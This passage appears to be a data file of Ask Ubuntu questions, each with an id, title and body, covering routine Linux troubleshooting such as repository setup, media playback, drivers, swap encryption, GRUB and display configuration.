# deb http : //ppa.launchpad.net/team-xbmc/ppa/ubuntu natty main # deb-src http : //ppa.launchpad.net/team-xbmc/ppa/ubuntu natty main # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu quantal main # deb-src http : //extras.ubuntu.com/ubuntu quantal main # deb http : //linux.dropbox.com/ubuntu precise main # deb-src http : //linux.dropbox.com/ubuntu precise main # deb http : //ubuntu.cn99.com/ubuntu/ quantal-backports restricted main multiverse universe # remastersys # deb http : //www.geekconnection.org/remastersys/repository karmic/ # deb http : //linux.dropbox.com/ubuntu precise main # deb-src http : //linux.dropbox.com/ubuntu precise main # deb http : //ppa.launchpad.net/tldm217/tahutek.net/ubuntu natty main* # deb-src http : //ppa.launchpad.net/tldm217/tahutek.net/ubuntu natty main* # deb http : //ppa.launchpad.net/tldm217/tahutek.net/ubuntu natty main # disabled on upgrade to quantal # deb-src http : //ppa.launchpad.net/tldm217/tahutek.net/ubuntu natty main # disabled on upgrade to quantal deb http : //ubuntu.cn99.com/ubuntu/ precise main universe deb-src http : //ubuntu.cn99.com/ubuntu/ precise main universe # added by software-properties deb http : //security.ubuntu.com/ubuntu/ precise-security universe main deb-src http : //ubuntu.cn99.com/ubuntu/ precise-security universe main # added by software-properties deb http : //ubuntu.cn99.com/ubuntu/ precise-updates universe main deb-src http : //ubuntu.cn99.com/ubuntu/ precise-updates universe main # added by software-properties you can see i minimized sources.list and other repositories . still can not make any progress in handling this problem . ubuntu12.04lts , kernel 3.2.0-33-generic.any suggestion is appreciate.thanks in advance .
248148	ubuntu 12.10 can not play vcd	i can not play vcds in ubuntu 12.10 . but i can play dvds . i have done a lot research and found a ton of question and regarding this but none of the solutions worked for me . here is what i have tried so far as i said i can play dvd but not any vcds . to confirm this i have tried different vcds . i 'm using vlc . file reading failed : vlc could not read the file ( input/output error ) . file reading failed : vlc could not read the file ( input/output error ) . i 'm getting above error message when i try to play vcd using vlc . i can play the same vcd in windows xp installation ( i have installed both ubuntu and windows xp ) . then i tried sudo apt-get-install ubuntu-restricted-extras and it said i have updated software . then tried installing w32codecs which has already installed then some cdfs files actually tried most of the solutions and i have been trying for the last one week ... . please do not mark this as a duplicate , because i have tried most of solutions mentioned in ask ubuntu .
248157	why do i run out of memory even when nothing is running ?	i am currently facing a problem that when i run uclust , it keeps showing me mymalloc running ot of memory . the thing is that cuurently nothing is running in the system and my memory shows i am currently using only 1.7 gib ( 3.6 % ) of my 47.3 gib ram .
248158	how do i setup an encrypted swap file ?	when i installed ubuntu , i setup an encrypted home partition . now i have come to an issue where i am running out of memory because i have n't setup swap . how can i setup an encrypted swap file ? a couple of times while booting i 've seen some reference to cryptswap . i 've also got these lines contained in /etc/fstab # swap was on /dev/sda6 during installation # uuid=1ba8a53b-1842-4de7-8e38-2d6c79f3a1ab none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0
248159	having trouble running android sdk tool on 12.10	when i try to run the android sdk manager from the command line it does n't open . keeps giving me command not found or permission denied message like so . osama @ prometheus : /media/osama/develop/android-sdk-linux/tools $ pwd /media/osama/develop/android-sdk-linux/tools osama @ prometheus : /media/osama/develop/android-sdk-linux/tools $ /media/osama/develop/android-sdk-linux/tools/android bash : /media/osama/develop/android-sdk-linux/tools/android : permission denied osama @ prometheus : /media/osama/develop/android-sdk-linux/tools $ sudo /media/osama/develop/android-sdk-linux/tools/android sudo : /media/osama/develop/android-sdk-linux/tools/android : command not found osama @ prometheus : /media/osama/develop/android-sdk-linux/tools $ am i missing something ? am i doing something wrong ? please help .
248162	can i make okular use gnome 's open/save dialogs ?	i use okular as my pdf reader . i also have a lot of bookmarks in gnome files . so it would be nice to access them in okular 's open/save dialog . but because okular uses kde dialogs by default i am not able to access them . is there a way to set okular to use gnome 's open/save dialogs ?
248163	ubuntu crashing when i open firefox	it 's a fresh install . i installed proprietary drivers for my gtx 670 , but it screwed up the resolution , so i reverted back to the open-source drivers . i then got a lot of messages saying an internal error had occurred and to send the report . now when i open firefox it crashes ubuntu 12.10 to a black screen for a couple seconds , then puts me back at the login screen . the black screen says * stopping save kernel messages * starting cups printing spooler/server * checking battery state ... * stopping system v runlevel compatibility * starting i am unsure what is happening . i reinstalled ubuntu 3 times and keep running across this error . should i try ubuntu 13.04 ?
248165	ubuntu 12.10 wont install from hard drive after reboot prompt	after downloading ubuntu 12.10 and using the wubi option to install through windows 7 i hit a road block . i partitioned the c : drive to install linux and did the primary install no worries . but , after i get the prompt to reboot , which i do , i choose ubuntu and the installation starts just fine . it loads to the point of `` copying files '' and the progress bar moves along to approximately 2/3 but that 's it . it freezes there for around 30mins and then the spinning mouse stops and i 'm locked out all together . nothing works . i have to hold down the off button and force a shutdown . i 'm doing this on a newly purchased toshiba satellite p875d with 16gb ram , 640gb hhd and an amd a8 4500 x64 quad core processor . i split the partition giving linux 50gb of space which is more than enough . does anyone know why i 'm getting this problem ? i should n't have to burn a cd or create a usb to boot from with wubi but i will if this is where everything is going wrong .
248167	how to install touchegg on ubuntu 12.10 ?	i am running ubuntu 12.10 and i am trying to install touchegg so i can have multi-touch on my mousepad . i was following the guide here but i am not able to compile the source for some reason . can someone please help me ? when i reach the part that says to run make on the terminal i get : make : *** no targets specified and no makefile found . stop .
248172	conky changed to above all windows	i am running a conky script.last night i have gone through some updates and then its giving it window above all other windows . for more clarity you can eye my image .
248173	how can i prevent x windows from running when i boot ubuntu 12.10 ?	hi i want to boot ubuntu quantal to a command prompt always and then use startx to launch x-windows if required . i have used the following methods but none work correctly . update-rc.d -f lightdm remove -- -- does not work in quantal , works in debian sid . i used the boot paramter 'text ' on the grub command line . this does boot to console but then when i do startx only starts the server - no clients , if i do startx gnome-shell then gnome-shell runs but a lot of the initialisation is not done . i also used start lightdm ( after using the 'text ' boot parameter ) . the problem is x starts with clients ok , but then when i exit x the server does not shutddown . i would like to boot to a command prompt use startx to start gnome shell fully initialised , then on exit the x server should shutdown . i can do it fine in debian sid , ubuntu 12.04 but not ubuntu 12.10 . any help with quantal would be greatly appreciated . thanks , rob
248174	how to switch off automatic kernel updates ?	now nvidia with optimus and glfrx and bumblebee works fine here . i want to stay with kernel 3.5.0.22 and not being automatically updated again . how do i switch off automatic kernel updates ?
248179	finding diff to conffile ?	suppose some package foo ... $ apt-get install foo ..installs a dpkg blessed conffile /etc/foo.conf ( ie package maintainer version ) now suppose after the package is installed /etc/foo.conf is modifed , perhaps to add a line . we would now like to get a diff between the package maintainer version of foo.conf and the current one ( to see what local configuration changes were made ) . what 's the easiest way to do this ? one way would be to install the package in a chroot jail and then diff it to the clean one . is there an easier way ?
248180	laptop refuses to power down or restart from top bar power icon	i am running ubuntu 12.04 ( 32-bit ) on a dell vostro 1700 laptop . when i click 'shut down ' option on top bar far right button , it closes ubuntu but wo n't shut down . it just goes to a low-power state , from which i have to long-press the physical power button until i hear the hard drive spin down and lock . same thing happens if i tell it to restart . i can provide any system information needed to help troubleshoot this problem , but i have no idea where to begin .
248189	why does virtualbox ' virtual disk not grow automatically ?	i use virtualbox 4.2.6 with ubuntu 12.04 as a host and win xp as a guest . i assigned a virtual disk ( vdi ) that grows with xp to a a maximum of 40 gb . currently it uses 25 gb . within xp it repeatedly tells me that there is not enough space available . i still have plenty of space on my host 's primary disk df -h /dev/sda1 143g 48g 89g 35 % / what to do to expand my xp 's disk ? this question did not help me , btw .
248190	how to re-install network	i had an issue with my realtek network drivers and r8168 . so i followed many guides on how to fix this and i installed and compiled the latest drivers from realtek , however , in the end i still had the same issues . my problem now is that the driver is totally screwed somehow . i tried re-installing it , tried taking in on and off the blacklist but it seems nothing i try works . so i need a way to completely reinstall and reconfigure the network in ubuntu . if i can uniinstall the network component ( lan cable / ipv4 ) and reinstall it that would be great . any ideas ? bte - i 'm using a 3g connection for the meanwhile .
248192	ubuntu vlc subtitles blurry	when i watch a film with subtitles in either vlc or other movie players , the subtitle is n't as clear as on windows . it 's thin and seems to be grayed out , whereas in vlc on windows i have a clear white subtitle ( i checked the settings for vlc subtitles in both windows and ubuntu and they are identical ) . i am using arial , and first i thought it was the font because it was n't included in the ubuntu default , so i changed it with no results . screenshots : ubuntu : windows : i have no idea how to make subtitles work . i am planning to switch to ubuntu for good , but there are many detail problems like this that really make my movement hard .
248196	how to password protect grub menu entry ?	is there a way i can password protect grub menu entry- e.g . if i dual boot with windows 7 can i set it so that a password is needed to boot into win 7 ? secondly i would also like to protect grub menu entries being changed if possible . thanks
248197	problem met when installing usb wireless card . rt2870	usb wireless adapter : rt2870 operation system : debian 6 things i 've done : 1 , download drive from http : //www.ralinktech.com 2 , unzip to /home/vincent 3 , open /home/vincent/rt2870/os/linux/config.mk change the following attributes from “no ( =n ) ” : support wpa_supplicant has_wpa_supplicant=n support native wpasupplicant for network maganger has_native_wpa_supplicant_support=n … to value “yes ( =y ) ” : support wpa_supplicant has_wpa_supplicant=y support native wpasupplicant for network maganger has_native_wpa_supplicant_support=y 4 , install linux-headers , build-essential sudo apt-get install linux-headers-2.6.32-5-686 sudo apt-get install build-essential 5 , install firmware-ralink , wireless-tools sudo apt-get install firmware-ralink wireless-tools and the light on the wireless adapter is flashing computer can recognize wireless adapter : vincent @ debian : ~/rt2870drive $ lsusb bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 010 : id 12d1:1436 huawei technologies co. , ltd . bus 002 device 008 : id 148f:3070 ralink technology , corp. rt2870/rt3070 wireless adapter bus 002 device 002 : id 0bda:0158 realtek semiconductor corp. usb 2.0 multicard reader bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 0bda:8189 realtek semiconductor corp. rtl8187b wireless 802.11g 54mbps network adapter bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub but i was stuck up after run make vincent @ debian : ~ $ cd rt2870drive vincent @ debian : ~/rt2870drive $ make make -c tools make [ 1 ] : entering directory `/home/vincent/rt2870drive/tools' gcc -g bin2h.c -o bin2h make [ 1 ] : leaving directory `/home/vincent/rt2870drive/tools' /home/vincent/rt2870drive/tools/bin2h cp -f os/linux/makefile.6 /home/vincent/rt2870drive/os/linux/makefile make -c /lib/modules/2.6.32-5-686/build subdirs=/home/vincent/rt2870drive/os/linux modules make [ 1 ] : entering directory `/lib/modules/2.6.32-5-686/build' make [ 1 ] : * 没有规则可以创建目标“modules”。 停止。//translate : no rules can create target '' modules '' . stop . ( i do n't know whether it 's right ... ) make [ 1 ] : leaving directory `/lib/modules/2.6.32-5-686/build' make : * [ linux ] 错误 2 vincent @ debian : ~/rt2870drive $ what can i do to continue my installation ?
248200	ubuntu 12.10 : start applications in certain workspace on bootup	i am looking for an application or script etc that would allow me to run my start up applications in different workspaces . i currently have 8 workspaces and 6 programs i always have start up , however it becomes a real pain to move each program to there respective workspaces each boot up . i have found a few ways of doing this but nothing speaks of ubuntu 12.04/10 with unity . hope you can help !
248205	ubuntu installation on dell insipiron 14r	i have just bought a new dell inspiron 14r laptop . i want to install ubuntu on the system but the main problem i am facing is there are already 4 partitions built in to the laptop and other than that i have three partitions , one of which contain windows 8 . so as of now there are total 7 primary partitions as under : 1 . efi system partition ( 500mb ) 2 . oem partition ( 400mb ) 3 . recovery partition ( 500mb ) 4 . recovery partition ( 7.87gb ) 5 . windows8 partition ( 105gb ) 6 . other 1 ( 255gb ) 7 . other 2 ( 100gb ) please suggest how to install ubuntu 12.04 lts on the machine as it says the machine should have only four primary partitions and rest all it identifies as raw partitions .
248206	override default browser in unity-mail	default bowser is firefox . this should stay like this . i want to click on unity-mail button and chrome should open instead of firefox . is this possible . is there a switch in .config/unity-mail.conf ? . i ca n't find any documentation . thank you for your time .
248208	how to install autodesk maya 2013 on ubuntu 12.10 ?	i am trying to install autodesk maya 2013 in ubuntu 12.10 but i do n't know where to start . how can i do it ?
248211	how to shut down ubuntu 11.10 host from within a windows 7 virtualbox guest ?	i have installed virtual box 4.2 on a ubuntu 11.10 host . i have windows 7 as the only guest os . i 'm able to auto start windows 7 virtual when ubuntu boots by adding it in start application with the command `` vboxmange startvm win7 '' in the command option . now when i shutdown windows 7 , the virtualbox program is getting closed , but i go back to ubuntu , when i want to have ubuntu shut down as well when i click shutdown in windows 7 in virtualbox . this is an assignment for me . can anybody please help me on this ? also , when virtual box starts up automatically , ubuntu 's desktop should not be visible .
248213	windows over ubuntu	i installed ubuntu 12.10 few days ago to test it on my computer using wubi . unfortunately i had a problem with my video card driver as i could not install it due to fglrx issues . i followed the how-to on installation very closely but it still did n't work . the result was poor graphics . i want to go back to windows for now , by making a bootable flash drive in ubuntu , but i have no idea how to boot up my flash driver from ubuntu either . can anyone help with this ?
248215	how to run doom3 bfg executable ?	i installed doom3 bfg edition the way it said over here . the whole procedure was carried out as instructed . when i double clicked the executable file , my computer didn’t know how to open it so nautilus searched for an app on the internet and suggested to download pypar2 , i downloaded it opened the executable file again and pypar2 gave me options to create something ; and i did it . i still can not play the game . i’m running edubuntu 12.10 , and the directory is created in an ntfs formatted drive . p.s . its a fresh new edubuntu installation , i haven’t installed any updates yet .
248216	how can i give my account admin powers again ?	when i installed ubuntu i used a password and `` admin '' type account . but accidentally i changed it 's type to `` standard '' . so i ca n't use any privileges right now . at least i ca n't access any of my partitions . when i try to access them the system asks for a password and says my old password is wrong .
248217	bash - get sudoer username ?	say i have the following bash script : # ! /bin/bash echo $ ( whoami ) this is what it outputs with and without sudo : alix @ netbook : ~ $ ./test.sh alix alix @ netbook : ~ $ sudo ./test.sh root the script executes several commands that require superuser priviledges , but i also want to add the original executing user to a group . is there any command that returns alix if i run sudo ./test.sh ?
248222	reccomended upgrade for ram ubuntu 12.04	i am running ubuntu 12.04 32 bit on my laptop ( toshiba sattelite l-450 ) , the spec is as follows memory : 2.8gb intel速 celeron ( r ) cpu 900 @ 2.20ghz graphics mobile intel速 gm45 express chipset x86/mmx/sse2 at present the laptop is running slower than i would like , ( though i know this isnt down to ubuntu os ) there is a 64bit version of 12.04 , would this give me any gains in performance ? as i am not really knowledgeable in this area i was wondering if someone could recommend my options to upgdade the ram and maybe go to the 64bit version of ubuntu . how much ram can i add and is it worth upgrading to 64bit afterwards ? i hope that this question is suitable for this forum advice greatly appreciated
248224	what free pdf editing software packages are available ?	i 'm looking for a free pdf editor that will allow me to selectively delete pages and content , including selective parts of a specific page ( the use case : reading a large documentation pdf . need to cut down the noise by deleting stuff that i identify as not relevant ) . does anyone know of such a tool ?
248225	recent update crashed unity and window manager	i just updated a few packages . among them was the ubuntu-desktop package ( maybe it has something to do with that ) . after the update the unity launcher no longer stacks items , so i have to scroll . additionally the grid system ( moving a window to the top , left or right of a screen to maximize it ) does not work anymore . starting unity from a console gives back checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x1a00004 compiz ( core ) - warn : failed to receive configurenotify event on 0x1400002 compiz ( core ) - warn : failed to receive configurenotify event on 0x140000c compiz ( core ) - warn : failed to receive configurenotify event on 0x1200002 compiz ( core ) - warn : failed to receive configurenotify event on 0x1200047 compiz ( core ) - warn : failed to receive configurenotify event on 0x4600003 compiz ( core ) - warn : failed to receive configurenotify event on 0x40000b8 initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing resize options ... done initializing place options ... done initializing mousepoll options ... done initializing gnomecompat options ... done initializing session options ... done initializing unitymtgrabhandles options ... done initializing snap options ... done initializing grid options ... done initializing wall options ... done initializing move options ... done initializing vpswitch options ... done initializing animation options ... done initializing workarounds options ... done initializing fade options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done initializing scale options ... done ( compiz:3060 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed compiz ( unityshell ) - error : gl_arb_vertex_buffer_object not supported x error of failed request : badaccess ( attempt to access private resource denied ) major opcode of failed request : 33 ( x_grabkey ) serial number of failed request : 7120 current serial number in output stream : 7366 i have an ati card with the newest catalyst drivers installed . if i can provide any more information for someone to help me , please ask . thank you !
248227	my ubuntu 12.10 does not show the wireless network list	i tried everything i found on this site , all the related questions , but nothing seems to work . i am using a macbook pro , the 2012 release . i already tried installing fwcutter , and many other options , but the list of wireless network simply does n't appear . what can i do ?
248234	how can i change folder permissions in a luks encrypted partition	i have a folder in a luks encrypted partition /media/user/luks-partition/folder on ubuntu 12.10 . i am not able to change folder 's permissions . i tried using the nautilus gui and chroot both as $ user and as # root . my question is similar to this ubuntu-partition-permissions ( but no working answers have been given )
248235	is there a way to add icons to the scale mode ?	sometime i have tons of windows open and it 'd be really helpful to have their icons attached to them ( in the scale view ) to make it easier to find what i need . is there a way to do that in compiz settings manager ? thanks .
248240	inconsistent ability to resolve dns on ubuntu 12.10 fresh install	for machines on my local network i use my router ( running dd-wrt v24-sp2 ( 08/07/10 ) std-nokaid-small ) to dhcp ip addresses and to resolve names . i now frequently notice that my web browsers ca n't resolve these names until after i open a terminal window and dig mycomputer.mylan @ 192.168.1.100 ( the router ) or sometimes try some other networking commands . this happens on both wired and wifi devices on the local network . here is an example : jelevin @ mycomputer : ~ $ ping mycomputer.lan ping : unknown host mycomputer.lan jelevin @ mycomputer : ~ $ host mycomputer.lan mycomputer.lan has address 192.168.1.236 jelevin @ guava : ~ $ ping mycomputer.lan ping guava.family ( 192.168.1.236 ) 56 ( 84 ) bytes of data . 64 bytes from guava.family ( 192.168.1.236 ) : icmp_req=1 ttl=64 time=0.023 ms ... i have reinstalled and dpkg-reconfigered resolvconf . here is the contents of /etc/resolv.conf jelevin @ mycomputer : ~ $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 search lan any suggestions ? thanks !
248242	cad plus numerical simulation	i am a chemical engineer & our cad usage differs from general cad usage in the sense that we do more simulation on a model than actually designing that model . in windows we use comsol multiphysics for model simulation is there something similar for linux ... my search only has found this : http : //www.opencascade.org/occt/areas/ which looks promising but further ideas are welcome
248245	global menu stopped working in nautilus	the top menu for nautilus does n't work any more ... the image in attach shows what happens when i click on the 'bookmark ' button ( this only happens with nautilus ) . it was n't like that a couple of days ago ... i think it 's related to a recent update . how can i bring my beloved top menu back ? edit : i solved it by restarting ubuntu ... .
248247	can i store files and folders on a live usb	sorry but my flasher is quite big . i wonder , i have some movies and stuff . could i store them on the same flash drive after installing ubuntu so that i could store them on the usb drive . ( i just want to store files in the space i did n't use ( reserved space ) to store my files and folders . i am using windows .
248253	error occured while installing ubuntu 12.04 using windows installer for ubuntu desktop	while trying to install ubuntu 12.04 using wubi on my machine which is already installed with win7 , at last it is throwing an error pop-up with error code 22 and also says that invalid argument . following is the data from log file h : \ubuntu\ubuntu.ico 01-27 18:52 debug tasklist : # # finished copy_installation_files 01-27 18:52 debug tasklist : # # running get_iso ... 01-27 18:52 debug tasklist : new task copy_file 01-27 18:52 debug tasklist : # # # running copy_file ... 01-27 19:12 debug tasklist : # # # finished copy_file **01-27 19:15 error tasklist : [ errno 22 ] invalid argument traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\utils.py '' , line 202 , in copy_file ioerror : [ errno 22 ] invalid argument 01-27 19:15 debug tasklist : # cancelling tasklist 01-27 19:15 debug tasklist : new task check_iso 01-27 19:15 error root : [ errno 22 ] invalid argument traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\utils.py '' , line 202 , in copy_file ioerror : [ errno 22 ] invalid argument 01-27 19:15 error tasklist : 'nonetype ' object has no attribute 'get_info' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 595 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 564 , in use_cd attributeerror : 'nonetype ' object has no attribute 'get_info' 01-27 19:15 debug tasklist : # cancelling tasklist 01-27 19:15 debug tasklist : # finished tasklist** above is the part of log file where it is showing error . please help me with this issue .
248254	launcher applications `` shadow '' remains where it was when mouse hovered over it	the background : i recently installed conky and configured it a little bit using some google search and some posts on google+ , which i do n't think is the root cause of the problem below . i wrote a 1-line scriptconky -c script_path to run conky at start-up and added that script to `` start-up applications '' . the problem : whenever i log on , the launcher appears at log-in screen , which was not the case before i did this . the main problem is the `` shadow '' of applications locked to the launcher remain when i hover the mouse over the launcher . i know its difficult to imagine what i am saying , so i have included an image which describes my problem , please have a careful look over the image . specifications : i use the following softwares : ubuntu 12.10 64-bit unity 6.12.0 conky 1.9.0 hp 630 with 500 gb hdd and 4 gb ddrm , no graphics card i love to play around , so please feel free to express your opinions as to what has to be done . p.s . : when i try to log-in through gnome-shell , i can see the launcher on the left , which i feel is unusual , though it is not `` functional '' , meaning , clicking on the applications do not open them .
248265	loading umax astra slim 600 scanner on ubuntu	please help me with loading umax astra slim 600 scanner on ubuntu . i am unable to find a driver for ubuntu and linux . amit
248266	is there a way to disable laptop lcd on startup when external monitor is connected	am running 12.04 and gnome shell with a thinkpad x201 laptop and docking station . when i start the thinkpad in the docking station with the lid closed , ubuntu is recognizes that the external monitor is primary ( dp1 ) , but defaults the laptop lcd ( lvds1 ) as on . i would like it to be off at startup when in this mode . i discovered this answer and developed a version of the script indicated : xrandrexternal= '' xrandr -- output hdmi1 -- off -- output lvds1 -- off -- output dp1 -- mode 2560x1600 -- pos 0x0 -- rotate normal -- output vga1 -- off '' xrandrnoexternal= '' xrandr -- output hdmi1 -- off -- output lvds1 -- mode 1280x800 -- pos 0x0 -- rotate normal -- output dp1 -- off -- output vga1 -- off '' if xrandr | grep -q ' connected' then $ { xrandrexternal } else $ { xrandrnoexternal } fi i then tried to place this in my lightdm.conf as suggested in the post : [ seatdefaults ] greeter-session=unity-greeter user-session=ubuntu display-setup-script=/usr/share/display-setup-script.sh i verified that the script worked by running it first in terminal . at this point i ca n't automate this at startup . i tried both the display-setup-script and session-setup option and neither work . i also tried sticking this into my startup applications to no avail . i 'm not sure how to troubleshoot this further .
248273	what to do after changing the dual-boot os ?	so i have windows vista & ubuntu 11.10 . everything is ok , but i want to change change vista for seven . what do i need to do in order to get the grub menu to keep working correctly ? edit a file ? just update the grub ? i also want to shrink windows partition and expand ubuntu partition ... so what do i need to do to the grub menu ? thanks in advance !
248274	application to show uptime on desktop ?	i was wondering if there is an application that shows uptime on the desktop , something like a desktop widget .
248283	how do i find which packages could be set as automatically installed ?	i am having a hard time understand who depends on who using apt-cache depends and apt-cache rdepends . i am keeping a long list of packages that i installed to solve a number of dependency problems . i would like to know which packages set to manually installed could be set to automatically installed ( they are in the dependency tree of another package that is manually installed ) ?
248289	having trouble with mounting the hardisk	my seagate usb hard disk wo n't mount . fdisk -l reports : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001607e device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 163842047 81817600 7 hpfs/ntfs/exfat /dev/sda3 163844094 976773119 406464513 5 extended /dev/sda5 163844096 217092095 26624000 83 linux /dev/sda6 217094144 225900543 4403200 82 linux swap / solaris /dev/sda7 225902592 583307263 178702336 7 hpfs/ntfs/exfat /dev/sda8 583320213 976768064 196723926 7 hpfs/ntfs/exfat disk /dev/sdb : 1000.2 gb , 1000204885504 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525167 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x174de4c5 device boot start end blocks id system /dev/sdb1 * 2048 1953521663 976759808 6 fat16 sudo mount -t auto /dev/sdb1 /media/newhd reports : mount : you must specify the filesystem type sudo blkid reports : /dev/sda1 : label= '' system reserved '' uuid= '' ea8ca5b58ca57d27 '' type= '' ntfs '' /dev/sda2 : uuid= '' 7a66b7f966b7b46b '' type= '' ntfs '' /dev/sda5 : uuid= '' b2c6b94a-132c-440d-95ea-33ee55d60ec9 '' type= '' ext4 '' /dev/sda6 : uuid= '' 022d77c7-fc22-4dd7-b280-0fe400ae052f '' type= '' swap '' /dev/sda7 : label= '' study '' uuid= '' 7398578669b29a5e '' type= '' ntfs '' /dev/sda8 : uuid= '' 43215121476da725 '' type= '' ntfs '' previously it was ntfs partition and due to some technical mistake it has converted to fat16 .
248290	enable both edge scrolling and two-finger scrolling for touchpad	on ubuntu , i can choose between edge scrolling , and two-finger scrolling . but it 's a radio button , so i have to choose between one and the other . but is there any way to enable them both at the same time ? is this limitation because of the config gui only ?
248293	usb sound interface problem	i have a usb sound interface that i ca n't quite get working . the device input shows up in the system settings , but no output is available . i have been wrestling with this thing for 2 months and have been able to uncover little . any advice would be helpful . thanks . ubuntu 12.04 64bit m-audio fast track mkii
248294	android emulator does not show up ?	i have an acer travelmate 5735z , ubuntu 12.04 and trying to get android sdk running . when i run ./tools/emulator -avd myavd -verbose in the sdk directory , the emulator displays no error messages ( or warnings ) , but no gui appears ! i have tried several things , i am desperate by now . grateful for any suggestion .
248298	what are the alternatives for notify-send ?	i use notify-send for desktop notifications and i get notifications with expected summary and body . however , notify-send has limitations and so i would like a few recommendations on alternatives for notify-send . i would like these extra features : expiration time . size customizations ( size of the bubble ) . location modifications ( location of the bubble ) . bubble look ( color , transparency , shading ) ( if possible ) . i know python-notify and hesitate to use that as i am not familiar python . i would like a complete stand-alone program . any suggestions ?
248302	amd radeon stuck on boot	i recently tried installing ubuntu , but it got stuck on the bootscreen with the purple dots . i pressed the esc key for more info on where it hangs , and apparently it 's with my graphics card ( amd radeon hd 6670 ) . the 2 lines that i think is needed is these : fbcon : radeondrmfb ( fb1 ) is primary device fbcon : remapping primary device , fb1 , to tty 1-63 so i need to ask : how do i fix this : i
248305	brightness control not working for nvidia driver on w530 2436cto + ubuntu 12.10 x64	environment : ubuntu 12.10 x64 , bios ( have tried 2.06 , 2.50 ) . w530 2436cto , 3720qm , k1000m . the problem can be described below ( may looks duplicate at first sight ) the back light of screen after installed nvidia driver ( nvidia current from x-updates , or the different version from 304.32~311.32 from nvidia download site ) is always with the highest level . change the value of /sys/class/backlight/acpi_video/brightness have not any effect . seems as if the brightness control is entirely not working . i have tried to add acpi=thinkpad , acpi=vendor , acpi=legacy to linux kernel argument , but no lucky ( that should be , because from the very begin i can see thinkpad_acpi mod loaded ) . i also have tried to modify the /usr/share/x11/xorg.conf.d to include a conf file to include option `` registrydwords '' `` enablebrightnesscontrol=1 '' ( either manually , or via modify /usr/share/ubuntu-drivers-common/quirks/ to allow the parameter to be included ... a bit strange , in the materials provided by nvidia-current , these options were added to screen section . i have tried to put them both in device and screen section , but still no lucky ) nothing changed . in either cases , cat /proc/driver/nvidia/parameter shows empty string for registrydwords , but i can find logs in /var/log/xorg.0.log include strings below : 19.745 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 19.745 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 19.745 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 19.745 ] ( ** ) nvidia ( 0 ) : option `` nologo '' `` true '' [ 19.745 ] ( ** ) nvidia ( 0 ) : option `` registrydwords '' `` enablebrightnesscontrol=1 '' [ 19.745 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 20.588 ] ( ii ) nvidia ( gpu-0 ) : display ( lenovo group limited ( d nothing says the option is illegal ( as i have tried to use some unaccepted option name ) . so i have to doubt , could there be any other things affect this ? i have seen threads mentioned something in gnome setting daemon may produce similar issue , but the solution in those threads did n't help . nvidiabl modules can help to dim the screen , but there are something wrong which caused the backlight too dimmer : the brightness value read in /sys/class/backlight/nvidia-backlight/brightness is very large ( may be random , from over 3000+ to 10k+ ) , while the max_brightness is only 127. set any value below 127 cause the screen to be too dark to read , so this workaround not work for me too . because i have seen people works fine with w530 + nvidia + ubuntu x64 , and i have tried to nvidia driver from the first beta version which support k1000m to the latest version , i am doubt what could cause this issue and how should i continue the analysis ?
248310	how can i make my 3g usb adapter work ?	i own a 3g usb adapter ( digisol dg-ba3370 ) . when i plug it in , the green led lights up , but i can not use it . it works fine in windows xp . being a ubuntu fan , want to use the same here . kindly let me know the setup/configuration/work around to use the same on ubuntu . i have tata docomo 3g gsm sim used in the that device .
248311	vpn ike over tcp	i need a vpn connection to my work . it seems that the problem is the checkpoint client which is used in the windows landscape . is there any possibility that i can build such a connection under ubuntu 12.04 ? your help is much appreciated . br snofla
